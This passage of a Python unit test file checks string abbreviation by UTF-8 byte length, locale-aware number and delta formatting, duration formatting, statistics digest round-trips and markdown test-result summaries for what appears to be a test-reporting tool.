self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 98))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27))
self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26))
self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25))
self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 7))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 6))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 5))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 4))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 3))
# 1 byte utf characters
self.assertEqual('ab…yz', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 7))
self.assertEqual('ab…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 6))
self.assertEqual('a…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 5))
self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 4))
self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 3))
# mixed utf bytes: lengths=[1, 2, 3, 4, 4, 3, 2, 1]
self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 21))
self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 20))
self.assertEqual('a»▉𝒂…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 19))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 18))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 17))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 16))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 15))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 14))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 13))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 12))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 11))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 10))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 9))
self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 8))
self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 7))
self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 6))
self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 5))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 4))
self.assertEqual('…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 3))
# odd number of characters
# 4 bytes utf characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 101))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 100))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 99))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 98))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 97))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 96))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 95))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 94))
self.assertEqual('𝒂𝒃𝒄…𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 27))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 26))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 25))
self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 7))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 6))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 5))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 4))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 3))
# 1 byte utf characters
self.assertEqual('ab…xy', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 7))
self.assertEqual('ab…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 6))
self.assertEqual('a…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 5))
self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 4))
self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 3))
# mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3]
self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 17))
self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 16))
self.assertEqual('a»▉…a»▉', abbreviate_bytes('a»▉𝒂a»▉', 15))
self.assertEqual('a»▉…»▉', abbreviate_bytes('a»▉𝒂a»▉', 14))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 13))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 12))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 11))
self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 10))
self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 9))
self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 8))
self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 7))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 6))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 5))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 4))
self.assertEqual('…', abbreviate_bytes('a»▉𝒂a»▉', 3))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 2))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 1))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 0))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', -1))
def test_get_test_name(self):
self.assertEqual('Unknown test', get_test_name(None, None, None))
self.assertEqual('test name', get_test_name(None, None, 'test name'))
self.assertEqual('class name ‑ Unknown test', get_test_name(None, 'class name', None))
self.assertEqual('class name ‑ test name', get_test_name(None, 'class name', 'test name'))
self.assertEqual('file name ‑ Unknown test', get_test_name('file name', None, None))
self.assertEqual('file name ‑ test name', get_test_name('file name', None, 'test name'))
self.assertEqual('file name ‑ class name ‑ Unknown test', get_test_name('file name', 'class name', None))
self.assertEqual('file name ‑ class name ‑ test name', get_test_name('file name', 'class name', 'test name'))
def test_get_formatted_digits(self):
self.assertEqual(get_formatted_digits(None), (3, 0))
self.assertEqual(get_formatted_digits(None, 1), (3, 0))
self.assertEqual(get_formatted_digits(None, 123), (3, 0))
self.assertEqual(get_formatted_digits(None, 1234), (5, 0))
self.assertEqual(get_formatted_digits(0), (1, 0))
self.assertEqual(get_formatted_digits(1, 2, 3), (1, 0))
self.assertEqual(get_formatted_digits(10), (2, 0))
self.assertEqual(get_formatted_digits(100), (3, 0))
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
self.assertEqual(get_formatted_digits(dict()), (3, 3))
self.assertEqual(get_formatted_digits(dict(number=1)), (1, 3))
self.assertEqual(get_formatted_digits(dict(number=12)), (2, 3))
self.assertEqual(get_formatted_digits(dict(number=123)), (3, 3))
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
self.assertEqual(get_formatted_digits(dict(delta=1)), (3, 1))
self.assertEqual(get_formatted_digits(dict(number=1, delta=1)), (1, 1))
self.assertEqual(get_formatted_digits(dict(number=1, delta=12)), (1, 2))
self.assertEqual(get_formatted_digits(dict(number=1, delta=123)), (1, 3))
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
def test_get_magnitude(self):
self.assertEqual(None, get_magnitude(None))
self.assertEqual(+0, get_magnitude(+0))
self.assertEqual(-1, get_magnitude(-1))
self.assertEqual(+2, get_magnitude(+2))
self.assertEqual(None, get_magnitude(dict()))
self.assertEqual(+0, get_magnitude(dict(number=+0)))
self.assertEqual(+1, get_magnitude(dict(number=+1)))
self.assertEqual(-2, get_magnitude(dict(number=-2)))
self.assertEqual(3, get_magnitude(dict(number=3, delta=5)))
self.assertEqual(3, get_magnitude(dict(duration=3)))
self.assertEqual(3, get_magnitude(dict(duration=3, delta=5)))
self.assertEqual(None, get_magnitude(dict(delta=5)))
def test_get_delta(self):
self.assertEqual(None, get_delta(None))
self.assertEqual(None, get_delta(+0))
self.assertEqual(None, get_delta(-1))
self.assertEqual(None, get_delta(+2))
self.assertEqual(None, get_delta(dict()))
self.assertEqual(None, get_delta(dict(number=+0)))
self.assertEqual(None, get_delta(dict(number=+1)))
self.assertEqual(None, get_delta(dict(number=-2)))
self.assertEqual(5, get_delta(dict(number=3, delta=5)))
self.assertEqual(None, get_delta(dict(duration=3)))
self.assertEqual(5, get_delta(dict(duration=3, delta=5)))
self.assertEqual(5, get_delta(dict(delta=5)))
def test_as_short_commit(self):
self.assertEqual(as_short_commit(None), None)
self.assertEqual(as_short_commit(''), None)
self.assertEqual(as_short_commit('commit'), 'commit')
self.assertEqual(as_short_commit('0123456789abcdef'), '01234567')
self.assertEqual(as_short_commit('b469da3d223225fa3f014a3c9e9466b42a1471c5'), 'b469da3d')
def test_as_delta(self):
self.assertEqual(as_delta(0, 1), '±0')
self.assertEqual(as_delta(+1, 1), '+1')
self.assertEqual(as_delta(-2, 1), ' - 2')
self.assertEqual(as_delta(0, 2), '± 0')
self.assertEqual(as_delta(+1, 2), '+ 1')
self.assertEqual(as_delta(-2, 2), ' - 2')
self.assertEqual(as_delta(1, 5), '+ 1')
self.assertEqual(as_delta(12, 5), '+ 12')
self.assertEqual(as_delta(123, 5), '+ 123')
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
with temp_locale('en_US.utf8'):
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
def test_as_stat_number(self):
label = 'unit'
self.assertEqual(as_stat_number(None, 1, 0, label), 'N/A unit')
self.assertEqual(as_stat_number(1, 1, 0, label), '1 unit')
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
with temp_locale('en_US.utf8'):
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
self.assertEqual(as_stat_number(dict(number=1), 1, 0, label), '1 unit')
self.assertEqual(as_stat_number(dict(number=1, delta=-1), 1, 1, label), '1 unit - 1 ')
self.assertEqual(as_stat_number(dict(number=2, delta=+0), 1, 1, label), '2 unit ±0 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 1, label), '3 unit +1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 2, label), '3 unit + 1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 2, 2, label), ' 3 unit + 1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
with temp_locale('en_US.utf8'):
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
self.assertEqual(as_stat_number(dict(delta=-1), 3, 1, label), 'N/A unit - 1 ')
self.assertEqual(as_stat_number(dict(number=1, delta=-2, new=3), 1, 1, label), '1 unit - 2, 3 new ')
self.assertEqual(as_stat_number(dict(number=2, delta=+0, new=3, gone=4), 1, 1, label), '2 unit ±0, 3 new, 4 gone ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1, gone=4), 1, 1, label), '3 unit +1, 4 gone ')
def test_as_stat_duration(self):
label = 'time'
self.assertEqual(as_stat_duration(None, label), 'N/A time')
self.assertEqual(as_stat_duration(0, None), '0s')
self.assertEqual(as_stat_duration(0, label), '0s time')
self.assertEqual(as_stat_duration(12, label), '12s time')
self.assertEqual(as_stat_duration(72, label), '1m 12s time')
self.assertEqual(as_stat_duration(3754, label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(-3754, label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(d(3754), label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(d(3754, 0), label), '1h 2m 34s time ±0s')
self.assertEqual(as_stat_duration(d(3754, 1234), label), '1h 2m 34s time + 20m 34s')
self.assertEqual(as_stat_duration(d(3754, -123), label), '1h 2m 34s time - 2m 3s')
self.assertEqual(as_stat_duration(dict(delta=123), label), 'N/A time + 2m 3s')
def test_get_stats_digest_undigest(self):
digest = get_digest_from_stats(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
))
self.assertTrue(isinstance(digest, str))
self.assertTrue(len(digest) > 100)
stats = get_stats_from_digest(digest)
self.assertEqual(stats, UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
))
def test_digest_ungest_string(self):
digest = digest_string('abc')
self.assertTrue(isinstance(digest, str))
self.assertTrue(len(digest) > 10)
string = ungest_string(digest)
self.assertEqual(string, 'abc')
def test_get_stats_from_digest(self):
self.assertEqual(
get_stats_from_digest('H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA'),
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
def test_get_short_summary(self):
self.assertEqual('No tests found', get_short_summary(UnitTestRunResults(files=0, errors=[], suites=0, duration=123, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('10 tests found in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('All 10 tests pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=10, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('All 9 tests pass, 1 skipped in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=9, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('2 fail, 1 skipped, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('2 fail, 8 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=8, tests_skip=0, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('3 errors, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=0, tests_fail=0, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors', get_short_summary(UnitTestRunResults(files=1, errors=errors, suites=0, duration=0, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=4, tests_succ=4, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=5, tests_succ=4, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=7, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
def test_get_short_summary_md(self):
self.assertEqual(get_short_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)), ('4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:'))
def test_get_short_summary_md_with_delta(self):
self.assertEqual(get_short_summary_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='commit',
reference_type='type', reference_commit='0123456789abcdef'
)), ('4 tests - 5 5 :heavy_check_mark: +6 6 :zzz: - 7 7 :x: +8 8 :fire: - 9 '))
def test_get_long_summary_md_with_single_runs(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_multiple_runs(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_errors(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_deltas(self):
self.assertEqual(get_long_summary_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
)), ('1 files + 2 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'))
def test_get_long_summary_md_with_details_url_with_fails(self):
self.assertEqual(get_long_summary_md(
